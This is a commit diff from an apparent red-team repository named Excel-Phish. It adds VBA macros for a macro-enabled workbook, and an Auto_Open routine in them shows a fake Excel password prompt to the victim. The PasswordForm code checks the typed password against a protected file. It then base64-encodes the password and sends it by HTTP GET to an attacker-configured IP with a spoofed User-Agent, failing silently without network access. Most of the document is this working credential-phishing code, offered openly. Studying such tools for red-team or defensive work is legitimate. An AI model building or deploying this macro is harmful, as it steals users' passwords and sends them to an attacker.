spyr0-sec
diff --git a/‎AutoOpen.bas‎
Lines changed: 19 additions & 0 deletions b/‎AutoOpen.bas‎
Lines changed: 19 additions & 0 deletions
diff --git a/‎ErrorForm.frm‎
Lines changed: 19 additions & 0 deletions b/‎ErrorForm.frm‎
Lines changed: 19 additions & 0 deletions
diff --git a/‎ErrorForm.frx‎
4.02 KB b/‎ErrorForm.frx‎
4.02 KB
diff --git a/‎Excel-Phish.xlsm‎
30.9 KB b/‎Excel-Phish.xlsm‎
30.9 KB
diff --git a/‎PasswordForm.frm‎
Lines changed: 163 additions & 0 deletions b/‎PasswordForm.frm‎
Lines changed: 163 additions & 0 deletions
diff --git a/‎PasswordForm.frx‎
3.02 KB b/‎PasswordForm.frx‎
3.02 KB
diff --git a/‎README.md‎
Lines changed: 3 additions & 1 deletion b/‎README.md‎
Lines changed: 3 additions & 1 deletion
@@ -0,0 +1,19 @@
+Attribute VB_Name = "AutoOpen"
+Public FileName, FilePath, IPAddr As String
+
+Sub Auto_Open()
+  
+    ' TODO by attacker - Change variable values
+    FilePath = "Documentation"
+    FileName = "CHANGEME.xlsx"
+    IPAddr = "127.0.0.1"
+    
+    PasswordForm.FileNameLabel.Caption = "'" + FileName + "' is protected."
+
+    PasswordForm.Show
+    ' UX - Put cursor in textbox so victim can start typing as per normal functionality
+    PasswordForm.PasswordBox.SetFocus
+End Sub
+
+
+
@@ -0,0 +1,19 @@
+VERSION 5.00
+Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} ErrorForm 
+   Caption         =   "Microsoft Excel"
+   ClientHeight    =   1320
+   ClientLeft      =   108
+   ClientTop       =   456
+   ClientWidth     =   9396.001
+   OleObjectBlob   =   "ErrorForm.frx":0000
+   StartUpPosition =   1  'CenterOwner
+End
+Attribute VB_Name = "ErrorForm"
+Attribute VB_GlobalNameSpace = False
+Attribute VB_Creatable = False
+Attribute VB_PredeclaredId = True
+Attribute VB_Exposed = False
+Private Sub OKButton_Click()
+    ErrorForm.Hide
+    PasswordForm.Show
+End Sub
@@ -0,0 +1,163 @@
+VERSION 5.00
+Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} PasswordForm 
+   Caption         =   "Password"
+   ClientHeight    =   1632
+   ClientLeft      =   108
+   ClientTop       =   456
+   ClientWidth     =   4668
+   OleObjectBlob   =   "PasswordForm.frx":0000
+   StartUpPosition =   1  'CenterOwner
+End
+Attribute VB_Name = "PasswordForm"
+Attribute VB_GlobalNameSpace = False
+Attribute VB_Creatable = False
+Attribute VB_PredeclaredId = True
+Attribute VB_Exposed = False
+Option Explicit
+
+Private Const clOneMask = 16515072          '000000 111111 111111 111111
+Private Const clTwoMask = 258048            '111111 000000 111111 111111
+Private Const clThreeMask = 4032            '111111 111111 000000 111111
+Private Const clFourMask = 63               '111111 111111 111111 000000
+
+Private Const clHighMask = 16711680         '11111111 00000000 00000000
+Private Const clMidMask = 65280             '00000000 11111111 00000000
+Private Const clLowMask = 255               '00000000 00000000 11111111
+
+Private Const cl2Exp18 = 262144             '2 to the 18th power
+Private Const cl2Exp12 = 4096               '2 to the 12th
+Private Const cl2Exp6 = 64                  '2 to the 6th
+Private Const cl2Exp8 = 256                 '2 to the 8th
+Private Const cl2Exp16 = 65536              '2 to the 16th
+
+' UX - Enter key will now
+Private Sub PasswordBox_KeyDown(ByVal KeyCode As MSForms.ReturnInteger, ByVal Shift As Integer)
+    If KeyCode = vbKeyReturn Then
+         OKButton_Click
+    End If
+End Sub
+
+Private Sub OKButton_Click()
+
+On Error Resume Next
+
+Dim Path As String
+Path = Application.ActiveWorkbook.Path
+
+Dim src As Workbook
+On Error GoTo WrongPWD
+Set src = Workbooks.Open(Path + "\" + FilePath + "\" + FileName, True, True, Password:=PasswordBox.text)
+ThisWorkbook.Activate
+Worksheets("Sheet1") = src.Worksheets("sheet1")
+
+WrongPWD:
+  
+    If Err.Number = 1004 Then
+        PasswordForm.Hide
+        ErrorForm.Show
+    Else
+        SendData
+    End If
+    
+End Sub
+
+Private Sub CancelButton_Click()
+    Workbooks.Close
+End Sub
+
+Public Function SendData()
+
+On Error GoTo Timeout
+
+Dim objHTTP, myurl As Variant
+Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
+
+' Optional - Change timeouts to larger values if slow network
+objHTTP.SetTimeouts 200, 200, 200, 200
+
+myurl = "http://" + IPAddr + "/" + EncodeBase64(PasswordBox.text)
+objHTTP.Open "GET", myurl, False
+objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
+objHTTP.send ("")
+ActiveWorkbook.Close False
+
+' If victim does not have network connectivity, do not break functionality
+Timeout:
+        ActiveWorkbook.Close False
+        PasswordForm.Hide
+        Exit Function
+
+End Function
+
+' Had issue with the initial encoding function, this works - https://stackoverflow.com/a/170018
+Public Function EncodeBase64(sString As String) As String
+
+    Dim bTrans(63) As Byte, lPowers8(255) As Long, lPowers16(255) As Long, bOut() As Byte, bIn() As Byte
+    Dim lChar As Long, lTrip As Long, iPad As Integer, lLen As Long, lTemp As Long, lPos As Long, lOutSize As Long
+
+    For lTemp = 0 To 63                                 'Fill the translation table.
+        Select Case lTemp
+            Case 0 To 25
+                bTrans(lTemp) = 65 + lTemp              'A - Z
+            Case 26 To 51
+                bTrans(lTemp) = 71 + lTemp              'a - z
+            Case 52 To 61
+                bTrans(lTemp) = lTemp - 4               '1 - 0
+            Case 62
+                bTrans(lTemp) = 43                      'Chr(43) = "+"
+            Case 63
+                bTrans(lTemp) = 47                      'Chr(47) = "/"
+        End Select
+    Next lTemp
+
+    For lTemp = 0 To 255                                'Fill the 2^8 and 2^16 lookup tables.
+        lPowers8(lTemp) = lTemp * cl2Exp8
+        lPowers16(lTemp) = lTemp * cl2Exp16
+    Next lTemp
+
+    iPad = Len(sString) Mod 3                           'See if the length is divisible by 3
+    If iPad Then                                        'If not, figure out the end pad and resize the input.
+        iPad = 3 - iPad
+        sString = sString & String(iPad, Chr(0))
+    End If
+
+    bIn = StrConv(sString, vbFromUnicode)               'Load the input string.
+    lLen = ((UBound(bIn) + 1) \ 3) * 4                  'Length of resulting string.
+    lTemp = lLen \ 72                                   'Added space for vbCrLfs.
+    lOutSize = ((lTemp * 2) + lLen) - 1                 'Calculate the size of the output buffer.
+    ReDim bOut(lOutSize)                                'Make the output buffer.
+
+    lLen = 0                                            'Reusing this one, so reset it.
+
+    For lChar = LBound(bIn) To UBound(bIn) Step 3
+        lTrip = lPowers16(bIn(lChar)) + lPowers8(bIn(lChar + 1)) + bIn(lChar + 2)    'Combine the 3 bytes
+        lTemp = lTrip And clOneMask                     'Mask for the first 6 bits
+        bOut(lPos) = bTrans(lTemp \ cl2Exp18)           'Shift it down to the low 6 bits and get the value
+        lTemp = lTrip And clTwoMask                     'Mask for the second set.
+        bOut(lPos + 1) = bTrans(lTemp \ cl2Exp12)       'Shift it down and translate.
+        lTemp = lTrip And clThreeMask                   'Mask for the third set.
+        bOut(lPos + 2) = bTrans(lTemp \ cl2Exp6)        'Shift it down and translate.
+        bOut(lPos + 3) = bTrans(lTrip And clFourMask)   'Mask for the low set.
+        If lLen = 68 Then                               'Ready for a newline
+            bOut(lPos + 4) = 13                         'Chr(13) = vbCr
+            bOut(lPos + 5) = 10                         'Chr(10) = vbLf
+            lLen = 0                                    'Reset the counter
+            lPos = lPos + 6
+        Else
+            lLen = lLen + 4
+            lPos = lPos + 4
+        End If
+    Next lChar
+
+    If bOut(lOutSize) = 10 Then lOutSize = lOutSize - 2 'Shift the padding chars down if it ends with CrLf.
+
+    If iPad = 1 Then                                    'Add the padding chars if any.
+        bOut(lOutSize) = 61                             'Chr(61) = "="
+    ElseIf iPad = 2 Then
+        bOut(lOutSize) = 61
+        bOut(lOutSize - 1) = 61
+    End If
+
+    EncodeBase64 = StrConv(bOut, vbUnicode)                 'Convert back to a string and return it.
+
+End Function
@@ -13,8 +13,10 @@
 
 The xlsm will work as-is, however you may wish to recreate the document rather than running random macros from the Internet. Therefore the three standalone VBA files have been exported for review. 
 
+## Introduction
+
 Phish password protected Excel-Files - written by [0x23353435](https://github.com/0x23353435) and [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t).
 
 The corresponding blogpost can be found here:
 
-[https://s3cur3th1ssh1t.github.io/Phish-password-protected-Excel-files/](https://s3cur3th1ssh1t.github.io/Phish-password-protected-Excel-files/)
+[https://s3cur3th1ssh1t.github.io/Phish-password-protected-Excel-files/](https://s3cur3th1ssh1t.github.io/Phish-password-protected-Excel-files/)